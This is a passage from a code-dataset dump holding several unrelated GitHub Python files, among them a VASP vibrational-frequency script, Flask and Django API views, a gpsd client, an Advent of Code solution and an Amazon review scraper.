l=12)\n\n\t\t# Modify by atom index\n\t\telif ModificationType == 'i':\n\t\t\t# Ask for atom index\n\t\t\ttry:\n\t\t\t\tModyAtomIndex = input(' '*12+'> Modify mass of atom (index, 1 to '+str(AtomCounter)+') : ')\n\t\t\t\tAtom_index[ModyAtomIndex]\n\t\t\texcept:\n\t\t\t\tCodeStatus('Atom index not recognized. Atoms in POSCAR are numbered from ', l=8)\n\t\t\t\tcontinue\n\t\t\t# Ask for new mass\n\t\t\ttry:\n\t\t\t\tModifyAtomMass = float(input(' '*12+'> New mass (g/mol) of atom #'+ModyAtomIndex+' ('+Atom_index[ModyAtomIndex][0]+', '+str(Atom_index[ModyAtomIndex][1])+')'+' : '))\n\t\t\texcept:\n\t\t\t\tCodeStatus('Mass not recognized. Sure it was a number?', l=8)\n\t\t\t\tcontinue\n\t\t\t# Modify registry\n\t\t\tAtomMass[Atom_index[ModyAtomIndex][0]+'-Istp'] = ModifyAtomMass\n\t\t\tAtom_index[ModyAtomIndex] = [Atom_index[ModyAtomIndex][0]+'-Istp', ModifyAtomMass]\n\t\t\tCodeStatus('Added exception : Atom=' + str(Atom_index[ModyAtomIndex]), l=12)\n\n\t\t# Ask for review\n\t\tif input(' '*4+'> Review registry? (y/def=n) : ') == 'y':\n\t\t\tprint(' '*12+'Atom types and mases : '+str(AtomMass))\n\t\t\tprint(' '*12+'Atom index list : ')\n\t\t\tfor k in Atom_index:\n\t\t\t\tprint(' '*16+'Atom N='+str(k)+' , type '+Atom_index[k][0]+' , mass (g/mol) = '+str(Atom_index[k][1]))\n\n\telse:\n\t\tCodeStatus('Atom types and mases are set. Continuing ... ')\n\t\tModifiying = False\n\n\n\n\n############################################################################################\n#### Created: \tAtomMass = {'Atom name' : Atom mass}\n####\t\t\tAtom_index = {'Atom index number' : ( 'Atom name', Atom mass)}\n############################################################################################\n\n\n\n\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n############ Check Information in OUTCAR\n\ntry:\n\t# Getting OUTCAR\n\twith open('OUTCAR', 'r') as f:\n\t\tOutFile = f.readlines()\n\tCodeStatus('OUTCAR file found and read')\n\t# with open('POTCAR', 'r')\n\nexcept: quit('OUTCAR file not found')\n\n\n\nLineIter = iter(OutFile)\n# IBRION type\nwhile True:\n\ttry:\n\t\tiLine = next(LineIter)\n\t\tif 'IBRION' in iLine.split():\n\t\t\tif int(iLine.split()[2]) in [5,6,7]: CodeStatus('Calculation is of frequency type (IBRION='+iLine.split()[2]+')')\n\t\t\tbreak\n\n\texcept:\n\t\tquit(' '*8+'>>>> IBRION tag not found or incomplete, something is really wrong here')\n\n\n# DOF\nwhile True:\n\ttry:\n\t\tiLine = next(LineIter)\n\t\tif 'Degrees' in iLine.split():\n\t\t\tDOF = int(iLine.split()[5])\n\t\t\tCodeStatus('A total of '+str(DOF)+' degrees of freedom are considerated')\n\t\t\tbreak\n\texcept:\n\t\tquit(' ' * 8 + '>>>> Degrees of freedom not found')\n\n\n\n\n\n\n# Second derivative matrix\nwhile True:\n\ttry:\n\t\tiLine=next(LineIter)\n\t\tif ' SECOND DERIVATIVES (NOT SYMMETRIZED)\\n' == iLine:\n\t\t\t# DOF list\n\t\t\tnext(LineIter)\n\t\t\tDOF_list = next(LineIter).split()\n\t\t\tCodeStatus('Degrees of freedom list retrieved : '+str(DOF_list)) # Debug\n\t\t\t# Hessian\n\t\t\tHess = []\n\t\t\tfor iRow in range(DOF):\n\t\t\t\tHess.append([-float(ele) for ele in next(LineIter).split()[1:]])\n\n\t\t\t# End recollection\n\t\t\tbreak\n\n\texcept:\n\t\tquit(' ' * 8 + '>>>> Something is wrong with your second derivatives matrix. It may be missing or incomplete, check it out.')\n\n# Report Hessian\nCodeStatus('Hessian matrix properly retrieved')\n\ndef ReportHessian():\n\tprint(' (decimals chopepd only for visualization): \\n')\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tprint(' ' * 18, end='')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tfor iDOF in DOF_list: print(FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF), end=' ')\t\t\t# Debug\n\tprint('')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tfor iRow, iDOF in zip(Hess, DOF_list):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\t\tprint(' ' * 10, end=FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF))\t\t\t\t\t\t# Debug\n\t\tfor iCol in iRow:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\t\t\tprint(FixNumBlanck(iCol), end=' ')\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\t\tprint('')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tprint('')\n\n# ReportHessian()\t# Debug\n\n# Force symmetrization\nif not input(' '*4+'> Force symmetrization of Hessian by averaging (VASP default) ? (def=y/n) : ') == 'n':\n\t# top triangle\n\tfor i in range(len(DOF_list)-1):\n\t\tfor j in range(1+i,len(DOF_list)):\n\t\t\t# print('Index:('+str(i)+','+str(j)+')'+str(Hess[i][j]))\n\t\t\tHess[i][j] = (Hess[i][j] + Hess[j][i]) / 2.\n\t\t\tHess[j][i] = Hess[i][j]\n\nelse:\n\tCodeStatus('Keeping original non-symmetrized Hessian matrix from VASP OUTPUT: ')\n\tReportHessian()\n\n\n####################################################################\n#### Created: \tHess = Hessian matrix of second derivatives\n####################################################################\n\n\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n\n############ Recalculation of frequencies\n\neV2J = 1.602176634e-19\t# J/eV\nNav = 6.02214076e23\t\t# Part/mol\ncc = 299792458 \t\t\t# m/s\n\n\nMassHess = []\nfor iRow, iDOF in zip(Hess, DOF_list):\n\tMassHess_row = []\n\t# print(str(iDOF)+' = '+str(Atom_index[iDOF[:-1]])+' -> '+str(iRow)) # debug\n\tRowMass = Atom_index[iDOF[:-1]][1]\n\tfor iHess in iRow:\n\t\tMassHess_row.append(iHess/RowMass)\n\t# print('-'*20+'> ' + str(MassHess_row)) # debug\n\tMassHess.append(MassHess_row)\n\n\n\n\n# Report\nCodeStatus('Positive mass weighted hessian matrix constructed ')\n# print('(decimals chopepd only for visualization): \\n'+' ' * 12) \t\t\t\t\t\t\t\t\t# Debug\n# for iDOF in DOF_list: print(FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF, l=16), end=' ') \t# Debug\n# print('') \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# for iRow, iDOF in zip(MassHess, DOF_list): \t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# \tprint(' ' * 4, end=FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF))\t\t\t\t\t\t\t# Debug\n# \tfor iCol in iRow:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# \t\tprint(FixNumBlanck(iCol, l=16), end=' ')\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# \tprint('')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\n\n# Eigenvalues and Eigenvectors\nHessArray = np.array(MassHess)\neVal, eVect = np.linalg.eig(HessArray)\nCodeStatus('Eigenvalues and eigenvectors were calculated : \\n')\n\n# for iF in eVal: print(str(FixNumBlanck(iF, l=8, d=2)), end=' / ') # Debug\n# print() # Debug\n\n\n# Aplying factors\neVal = [k * eV2J * Nav * 1e3 * 1e20 for k in eVal]\t# [1/s^2],\n\n# Linear frequencies [1/s = Hz]\nFqReal = []; FqImg=[]\nfor iVal in eVal:\n\tif iVal <0: FqImg.append(\t((-iVal)**.5)\t/(2*np.pi))\n\telse: \t\tFqReal.append(\t((iVal)**.5)\t/(2*np.pi))\n\n# Order frequencies\nFqReal.sort(reverse=True)\nFqImg.sort(reverse=True)\n\n# Spectral frequencies [cm-1]\nFqRealcm = []; FqImgcm=[]\nfor iFq in FqReal: FqRealcm.append(\tiFq/(100*cc))\nfor iFq in FqImg: FqImgcm.append(\tiFq/(100*cc))\n\n# Report\ndef ReportFreqList(iFreqList, **kwargs):\n\tfor iFq in iFreqList: print(FixNumBlanck(iFq, l=kwargs.get('l',9), d=kwargs.get('g',2)), end='')\n\n\nprint(' '*8, end='Real freqs (THz) : ')\nReportFreqList([k*1e-12 for k in FqReal]) # THz\nprint('\\n'+' '*8, end=' (cm-1) : ')\nReportFreqList(FqRealcm) # cm-1\n\nprint('\\n\\n'+' '*8, end='Imaginary freqs (THz) : ')\nif len(FqImg) == 0: print('None found')\nelse:\n\tReportFreqList([k*1e-12 for k in FqImg]) # THz\n\tprint('\\n' + ' ' * 8, end=' (cm-1) : ')\n\tReportFreqList(FqImgcm) # cm-1\nprint('\\n')\n\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n\n\n############################### ZPVE calculation\nhh\t\t\t= 6.62606957E-34\ncc\t\t\t= 299792458\neV2J\t\t= 1.602176634E-19\ndef fZPVEi(iFreq):\n\treturn (iFreq * hh * cc * 100) / (2 * eV2J)\t\t\t# /(eV)\n\n# Contribuciones reales individuales\nFqRealeV = []\nfor iFq in FqRealcm: FqRealeV.append(fZPVEi(iFq))\n\n# Cut Off\ntry:\n\tCutOff = float(input(' '*2+'> CutOff for ZPVE (def=100cm-1) = '))\nexcept:\n\tCodeStatus('What\\'s that? Using default value = 100 cm-1')\n\tCutOff = 100\n\n# ZPVE summ\nZPVE = 0\nfor iFq in FqRealcm:\n\tif iFq > CutOff: ZPVE+=fZPVEi(iFq)\n\n# Report\nprint()\nSepare = True\nCodeStatus('ZPVE contributions (eV) : ', end='')\nfor iF in FqRealcm:\n\tif Separe and iF < CutOff:\n\t\tprint(' \\n'+' '*9+'real but not in ZPVE : ', end='')\n\t\tSepare = False\n\tprint(FixNumBlanck(fZPVEi(iF), l=4, d=4), end=' ' * 3) # eV\nprint('')\n\nCodeStatus('Accumulated ZPVE (eV) : '+str(FixNumBlanck(ZPVE, l=0))+' eV\\n')\n\n","repo_name":"sebagodoy/VASP_tools","sub_path":"VASP.vibrations.py","file_name":"VASP.vibrations.py","file_ext":"py","file_size_in_byte":15462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18500637929","text":"from flask import request, Blueprint\nimport requests\n\nfrom utils import load_file_config, HEADERS\n\nmesa_blueprints = Blueprint(\"mesa_blueprint\", __name__)\ndata_config = load_file_config()\nurl_base = data_config.get('url-backend-registraduria') + \"/mesa\"\n\n\n@mesa_blueprints.route(\"/mesas\", methods=['GET'])\ndef get_all_mesas() -> dict:\n url = f'{url_base}/all'\n response = requests.get(url, headers=HEADERS)\n return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/<string:id_>\", methods=['GET'])\ndef get_mesa_by_id(id_: str) -> dict:\n url = f'{url_base}/{id_}'\n response = requests.get(url, headers=HEADERS)\n return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/insert\", methods=['POST'])\ndef insert_mesa() -> dict:\n mesa = request.get_json()\n url = f'{url_base}/insert'\n response = requests.post(url, headers=HEADERS, json=mesa)\n return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/update/<string:id_>\", methods=['PUT'])\ndef update_mesa(id_: str) -> dict:\n mesa = request.get_json()\n url = f'{url_base}/update/{id_}'\n response = requests.patch(url, headers=HEADERS, json=mesa)\n return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/delete/<string:id_>\", methods=['DELETE'])\ndef delete_mesa(id_: str) -> dict:\n url = f'{url_base}/delete/{id_}'\n response = requests.delete(url, headers=HEADERS)\n return {\"message\": \"processed\"}, response.status_code\n","repo_name":"eyamayai/apiGateway_c17g4","sub_path":"registraduria_backend/mesa_blueprints.py","file_name":"mesa_blueprints.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30649076110","text":"class Analyzer:\n def __init__(self, fds, keys, relation, candidateKeys, subs):\n self.fds = fds\n self.primary = keys\n self.relation = relation\n self.candiKeys = candidateKeys\n self.subset = subs\n self.fdClosure = []\n for each in fds:\n self.fdClosure.append(each)\n\n def checkOneNF(self):\n return self.fds\n\n def checkTwoNF(self):\n return 'asd'\n\n def checkThreeNF(self):\n return 'asd'\n\n # Armstrong's Axiom of reflectivity\n def reflexitivity(self):\n for rel in self.relation:\n self.fdClosure.append(\n [[rel], [rel]]\n )\n for sset in self.subset:\n for sub in sset[1]:\n self.fdClosure.append([sset[0],[sub]])\n return self.fdClosure\n\n # Armstrong's Axiom of Augmentation\n # def augmentation(self):\n # for att in self.relation:\n # for one in self.fdClosure:\n # print(one, \"**\")\n\n def removeDup(self):\n return self.fdClosure\n\n def getLHS(self, lst):\n lhsList = []\n for item in lst:\n lhsList.append(item[0])\n return lhsList\n\n def getRHS(self, lst):\n rhsList = []\n for item in lst:\n rhsList.append(item[1])\n return rhsList\n\n\ncandidateKeys = ['A', 'C']\n\nR = ['A', 'B', 'C', 'D', 'E', 'F']\n\nfuncdeps = [\n [['A'], ['B']],\n [['C'], ['D']],\n]\n\nsubset = [[['A'], ['D', 'E']]]\n\n# experiments\ntest = Analyzer(funcdeps, '', R, candidateKeys, subset)\n\ntest.reflexitivity()\n# print(i[0], '->', i[1])\n\n# experiments.augmentation()\n\nfor a in test.removeDup():\n print(a)\n# for a in experiments.getLHS():\n# for b in experiments.getRHS():\n# print(a, '->', b)\n","repo_name":"amilacjay/isyntax","sub_path":"dbnormalizer/experiments/schemaAnalyzer.py","file_name":"schemaAnalyzer.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37204552250","text":"import json\ninput = open('day13/input13.txt').read().strip().replace('\\n\\n','\\n').split('\\n')\ninput.append('[[2]]')\ninput.append('[[6]]')\ninput = [json.loads(x) for x in input]\n\ndef compare(left,right):\n res = None\n lengths = [len(left),len(right)]\n for i in range(max(lengths)):\n if i == lengths[0]:\n return 1\n if i == lengths[1]:\n return 0\n if type(left[i]) == type(right[i]) and type(left[i])==int:\n if left[i] < right[i]:\n return 1\n if left[i] > right[i]:\n return 0\n if type(left[i]) == type(right[i]) and type(left[i])==list:\n res = compare(left[i],right[i])\n if type(left[i]) == int and type(right[i]) == list:\n res = compare([left[i]],right[i])\n if type(left[i]) == list and type(right[i]) == int:\n res = compare((left[i]),[right[i]])\n if res != None:\n return res\n\ndef bubblesort(unsortedList):\n n = len(unsortedList)\n swapped = False\n for i in range(n-1):\n if compare(unsortedList[i],unsortedList[i+1]) != 1:\n swapped = True\n unsortedList[i], unsortedList[i+1] = unsortedList[i+1], unsortedList[i]\n return swapped\n\nres = True\nwhile res == True:\n res = bubblesort(input)\n\nprint('the product of the indices =', (input.index([[2]])+1)*(input.index([[6]])+1))","repo_name":"categoraal/adventofcode2022","sub_path":"day13/day13q2.py","file_name":"day13q2.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38782374496","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport socket\nimport threading\nimport time\n\nimport gps\n\nfrom followme.geom import Point3D\nfrom followme.observable import Observable\nfrom followme.tools import AveragePosition\n\nLOG = logging.getLogger(__name__)\n\n\n# A placeholder value used before we receive any fix information\n# from gpsd.\nclass _NoFix (object):\n mode = 0\n\nNoFix = _NoFix()\n\n\nclass GPS(Observable, threading.Thread):\n def __init__(self, average_points=5, min_sats=5):\n super(GPS, self).__init__()\n self.setDaemon(True)\n self.lock = threading.Lock()\n\n self.min_sats = min_sats\n self._fix = NoFix\n self._lastfix = NoFix\n self._lastgood = None\n self._avg = AveragePosition(average_points)\n self._quit = False\n self._nsats_visible = 0\n self._nsats_used = 0\n\n def _set_fix(self, fix):\n with self.lock:\n self._lastfix = self.fix\n self._fix = fix\n\n if fix.mode == gps.MODE_3D:\n self._lastgood = fix\n self._avg.append(fix.lat, fix.lon, fix.alt)\n\n if self._lastfix.mode != self._fix.mode:\n self.notify_observers(self._lastfix, self._fix)\n\n def _set_nsats(self, sky):\n sats = sky.get('satellites', [])\n self._nsats_visible = len(sats)\n self._nsats_used = len([x for x in sats if x['used']])\n LOG.debug('sats visible=%d, used=%d, min=%d',\n self._nsats_visible,\n self._nsats_used,\n self.min_sats)\n\n def _run(self):\n self.gps = gps.gps()\n self.gps.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)\n\n for report in self.gps:\n if self._quit:\n break\n\n if report.get('class') == 'TPV':\n self._set_fix(report)\n elif report.get('class') == 'SKY':\n self._set_nsats(report)\n\n def run(self):\n while True:\n try:\n self._run()\n except socket.error:\n LOG.error('failed to connect gpsd')\n time.sleep(1)\n continue\n finally:\n self._set_fix(NoFix)\n\n def cancel(self):\n self._quit = True\n\n @property\n def fix(self):\n return self._fix\n\n @property\n def has_fix(self):\n return (\n self._fix.mode == gps.MODE_3D and\n self._nsats_used > self.min_sats\n )\n\n @property\n def pos(self):\n return self._avg.value\n\n @property\n def raw(self):\n fix = self._lastgood\n if not fix:\n return None\n\n return Point3D(fix.lat, fix.lon, fix.alt)\n","repo_name":"larsks/followme","sub_path":"followme/gpsclient.py","file_name":"gpsclient.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74729714433","text":"from imageai.Detection import ObjectDetection\n\ndetector = ObjectDetection()\n\nmodel_path = \"./imageAI/yolo-tiny.h5\"\ninput_path = \"./vid24TestImages/frame0.png\"\noutput_path = \"./newimage.jpg\"\n\ndetector.setModelTypeAsTinyYOLOv3()\ndetector.setModelPath(model_path)\ndetector.loadModel()\ndetection = detector.detectObjectsFromImage(input_image=input_path, output_image_path=output_path)\n\nfor eachItem in detection:\n print(eachItem[\"name\"] , \" : \", eachItem[\"percentage_probability\"])","repo_name":"Kunal2341/angledImageTransformation","sub_path":"EVERYTHINGELSE/otherCode/detectPersonTests-NotWorking/imageAItest.py","file_name":"imageAItest.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17906131916","text":"#!/usr/bin/env python\n\"\"\"\nPrecompute lensing pairs using UniverseMachine SMDPL catalog.\n\"\"\"\n\nimport os\nimport argparse\n\nimport numpy as np\n\nfrom astropy.table import Table\n\nfrom asap import vagc\n\n\ndef main(um_file, ptl_file, wl_min_r=0.08, wl_max_r=50.0, wl_n_bins=22, verbose=True):\n \"\"\"Pre-compute the particles pairs to calculate WL profile.\"\"\"\n # Read in the UM mock catalog\n um_mock = Table(np.load(um_file))\n if verbose:\n print(\"# Load in UM mock catalog: {}\".format(um_file))\n print(\"# Dealing with {} galaxies\".format(len(um_mock)))\n # Read in the particle table\n sim_particles = Table(np.load(ptl_file))\n if verbose:\n print(\"# Load in particle table: {}\".format(ptl_file))\n print(\"# Dealing with {} particles\".format(len(sim_particles)))\n\n # Output file name\n um_pre, _ = os.path.splitext(um_file)\n ptl_pre, _ = os.path.splitext(ptl_file)\n n_ptl = ptl_pre.split('_')[-1]\n precompute_out = \"{}_{}_r_{:4.2f}_{:4.1f}_{:2d}bins.npy\".format(\n um_pre, n_ptl, wl_min_r, wl_max_r, wl_n_bins\n )\n if verbose:\n print(\"# Output file name : {}\".format(precompute_out))\n\n # Run precompute\n if 'smdpl' in ptl_file:\n mass_encl = vagc.precompute_wl_smdpl(\n um_mock, sim_particles, wl_min_r=wl_min_r, wl_max_r=wl_max_r,\n wl_n_bins=wl_n_bins)\n elif 'mdpl2' in ptl_file:\n mass_encl = vagc.precompute_wl_mdpl2(\n um_mock, sim_particles, wl_min_r=wl_min_r, wl_max_r=wl_max_r,\n wl_n_bins=wl_n_bins)\n else:\n raise NameError(\"# Wrong simulation: [smdpl/mdpl2]\")\n\n np.save(precompute_out, mass_encl)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n 'um_file', type=str,\n help=('UniverseMachine snapshot file in .npy format'))\n\n parser.add_argument(\n 'ptl_file', type=str,\n help=('Simulation particle table in .npy format'))\n\n parser.add_argument(\n '-l', '--r_low', dest='wl_min_r',\n help='Lower limit of the radial bin',\n type=float, default=0.08)\n\n parser.add_argument(\n '-u', '--r_upp', dest='wl_max_r',\n help='Upper limit of the radial bin',\n type=float, default=50.0)\n\n parser.add_argument(\n '-n', '--n_bins', dest='wl_n_bins',\n help='Number of the radial bin',\n type=int, default=22)\n\n args = parser.parse_args()\n\n main(args.um_file, args.ptl_file,\n wl_min_r=args.wl_min_r, wl_max_r=args.wl_max_r,\n wl_n_bins=args.wl_n_bins)\n","repo_name":"dr-guangtou/asap","sub_path":"asap/scripts/um_precompute_pairs.py","file_name":"um_precompute_pairs.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25268008117","text":"from django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404\nfrom djoser.views import UserViewSet as DjoserUserViewSet\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.mixins import ListModelMixin\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom api.models import User, FriendRequest\nfrom api.serializers import UserSerializer, FriendRequestSerializer, FriendRequestToSerializer, \\\n FriendRequestBySerializer\n\n\nclass UserViewSet(DjoserUserViewSet):\n \"\"\"Вьюсет для пользователей.\"\"\"\n\n @action(\n permission_classes=[IsAuthenticated],\n methods=['post'],\n detail=True\n )\n def add_friend(self, request, id):\n \"\"\"Метод добавления друга.\"\"\"\n user = request.user\n friend = get_object_or_404(User, id=id)\n\n if user == friend:\n return Response(\n {'error': 'Нельзя добавить себя в друзья'},\n status=status.HTTP_400_BAD_REQUEST\n )\n if friend in user.friends.all():\n return Response(\n {'error': 'Этот пользователь уже у вас в друзьях'},\n status=status.HTTP_400_BAD_REQUEST\n )\n # Проверка на то, что пользователь отправил нам запрос в друзья\n if FriendRequest.objects.filter(\n requested_by=friend,\n requested_to=user\n ).exists():\n friend_request = FriendRequest.objects.get(\n requested_by=friend,\n requested_to=user\n )\n friend_request.delete()\n user.friends.add(friend)\n serializer = UserSerializer(\n friend, context={'request': request}\n )\n return Response(\n serializer.data, status=status.HTTP_201_CREATED\n )\n try:\n friend_request = FriendRequest.objects.create(\n requested_by=user,\n requested_to=friend\n )\n serializer = FriendRequestSerializer(\n friend_request, context={'request': request}\n )\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except Exception as e:\n return Response(\n {'error': 'Не удалось отправить заявку на добавление в друзья', 'err_msg': e},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n @action(\n permission_classes=[IsAuthenticated],\n methods=['delete'],\n detail=True\n )\n def delete_friend(self, request, id):\n \"\"\"Метод удаления друга.\"\"\"\n user = request.user\n friend = get_object_or_404(User, id=id)\n\n if friend not in user.friends.all():\n return Response(\n {'error': 'Этого пользователя нет у вас в друзьях'},\n status=status.HTTP_400_BAD_REQUEST\n )\n if user.friends.remove(friend):\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(\n {'error': 'Не удалось удалить друга'},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n @action(\n permission_classes=[IsAuthenticated],\n methods=['get'],\n detail=False\n )\n def friends(self, request):\n \"\"\"Метод просмотра списка друзей\"\"\"\n user = request.user\n friends = user.friends.all()\n serializer = UserSerializer(friends, many=True, context={'request': request})\n return Response(serializer.data)\n\n\nclass OutgoingRequestViewSet(ListModelMixin, viewsets.GenericViewSet):\n \"\"\"Вьюсет просмотра списка исходящих заявок.\"\"\"\n permission_classes = [IsAuthenticated]\n serializer_class = FriendRequestBySerializer\n\n def get_queryset(self):\n user = self.request.user\n return FriendRequest.objects.filter(requested_by=user).all()\n\n\nclass IncomingRequestViewSet(ListModelMixin, viewsets.GenericViewSet):\n \"\"\"Вьюсет просмотра списка исходящих заявок.\"\"\"\n http_method_names = ['get', 'post']\n permission_classes = [IsAuthenticated]\n serializer_class = FriendRequestToSerializer\n\n def get_queryset(self):\n user = self.request.user\n return FriendRequest.objects.filter(requested_to=user)\n\n @action(\n permission_classes=[IsAuthenticated],\n methods=['post'],\n detail=True\n )\n def accept(self, request, pk):\n \"\"\"Метод подтверждения заявки.\"\"\"\n user = request.user\n friend_request = get_object_or_404(FriendRequest, id=pk)\n friend = get_object_or_404(User, id=friend_request.requested_by.id)\n try:\n user.friends.add(friend)\n serializer = UserSerializer(\n friend, context={'request': request}\n )\n friend_request.delete()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except Exception or IntegrityError as e:\n return Response(\n {'error': 'Не удалось добавить в друзья', 'err_msg': e},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n @action(\n permission_classes=[IsAuthenticated],\n methods=['post'],\n detail=True\n )\n def decline(self, request, pk):\n \"\"\"Метод подтверждения заявки.\"\"\"\n friend_request = get_object_or_404(FriendRequest, id=pk)\n if friend_request.delete():\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(\n {'error': 'Не удалось отклонить заявку'},\n status=status.HTTP_400_BAD_REQUEST\n )\n","repo_name":"lzrdou/vk_internship_test","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31586105326","text":"import os\nimport time\n\nfrom datetime import datetime\n\nfrom hash_calc.HashCalc import HashCalc\n\nclass Controller():\n def __init__(self, path, hashingAllowed) -> None:\n self.startTime = time.time()\n self.md5 = \"-\"\n self.sha256 = \"-\"\n self.path = path\n if(hashingAllowed):\n h = HashCalc(path)\n self.md5 = h.md5\n self.sha256 = h.sha256\n\n def printHeader(self):\n print(\"######################################################################################################################\")\n print(\"\")\n print(\"Hexdump by 5f0\")\n print(\"Prints the hexdump of a selected file\")\n print(\"\")\n print(\"Current working directory: \" + os.getcwd())\n print(\" Investigated file: \" + self.path)\n print(\"\")\n print(\" MD5 Hash: \" + self.md5)\n print(\" SHA256 Hash: \" + self.sha256)\n print(\"\")\n print(\" Datetime: \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"))\n print(\"\")\n print(\"######################################################################################################################\")\n print(\"\")\n\n\n def writeFileHeader(self, outfile, path, isOffset=False, offset = 0, noOfBytes = 0):\n with open(outfile, \"w\") as f:\n f.write(\" Datetime: \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\") + \"\\n\")\n f.write(\"\\n\")\n f.write(\"Investigated File: \" + path + \"\\n\")\n f.write(\" MD5 Hash: \" + self.md5 + \"\\n\")\n f.write(\" SHA256 Hash: \" + self.sha256 + \"\\n\")\n f.write(\"\\n\")\n\n if(isOffset):\n e = open(path,\"rb\")\n e.seek(offset, 0)\n b = e.read(noOfBytes)\n e.close()\n h = HashCalc.fromBytes(b)\n f.write(\" Offset: \" + str(offset) + \"\\n\")\n f.write(\" No. of bytes: \" + str(noOfBytes) + \"\\n\")\n f.write(\" MD5 Hash: \" + h.md5 + \"\\n\")\n f.write(\" SHA256 Hash: \" + h.sha256 + \"\\n\")\n f.write(\"\\n\")\n\n\n def printExecutionTime(self):\n end = time.time()\n print(\"\")\n print(\"Execution Time: \" + str(end-self.startTime)[0:8] + \" sec\")\n print(\"\")","repo_name":"5f0ne/hexdump","sub_path":"src/hexdumper/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15612390434","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 2 19:08:03 2020\r\n\r\n@author: Shashank Sapaliga, Shashwat Sagar, Ishpreet Kaur, Dhwani Shah\r\n\"\"\"\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport csv\r\n\r\nclass Scrapper():\r\n def __init__(self):\r\n \r\n with open('OnePlus8_reviews.csv', 'w', encoding='utf-8', newline='') as file:\r\n writer = csv.writer(file)\r\n for i in range (1,20): \r\n url ='https://www.amazon.in/OnePlus-Mirror-Black-128GB-Storage/product-reviews/B085J17VVP/ref=cm_cr_arp_d_paging_btm_next_2?ie=UTF8&reviewerType=all_reviews&pageNumber='+str(i)\r\n r = requests.get('http://localhost:8050/render.html',params={'url':url, 'wait':2}) \r\n soup = BeautifulSoup(r.text, 'html.parser') \r\n reviews = soup.find_all('div', {'data-hook':'review'})\r\n for item in reviews:\r\n review_comments = item.find('span',{'data-hook':'review-body'}).text.strip()\r\n writer.writerow([review_comments]) \r\n print(\"Data has been successfully Scrapped from Amazon Website for OnePlus 8\") \r\n \r\n ","repo_name":"shashwatsagar/ReviewSummarizer","sub_path":"CustomerReviewSummarizer/WebScrapper/Scrapper.py","file_name":"Scrapper.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26382467048","text":"from typing import List\n\nimport torch\nfrom mr_node.data import Data\nfrom mr_node.utils import pairwise\n\n\nclass ODEFunc(torch.nn.Module):\n data: Data\n device: torch.device\n start_time: int\n\n def 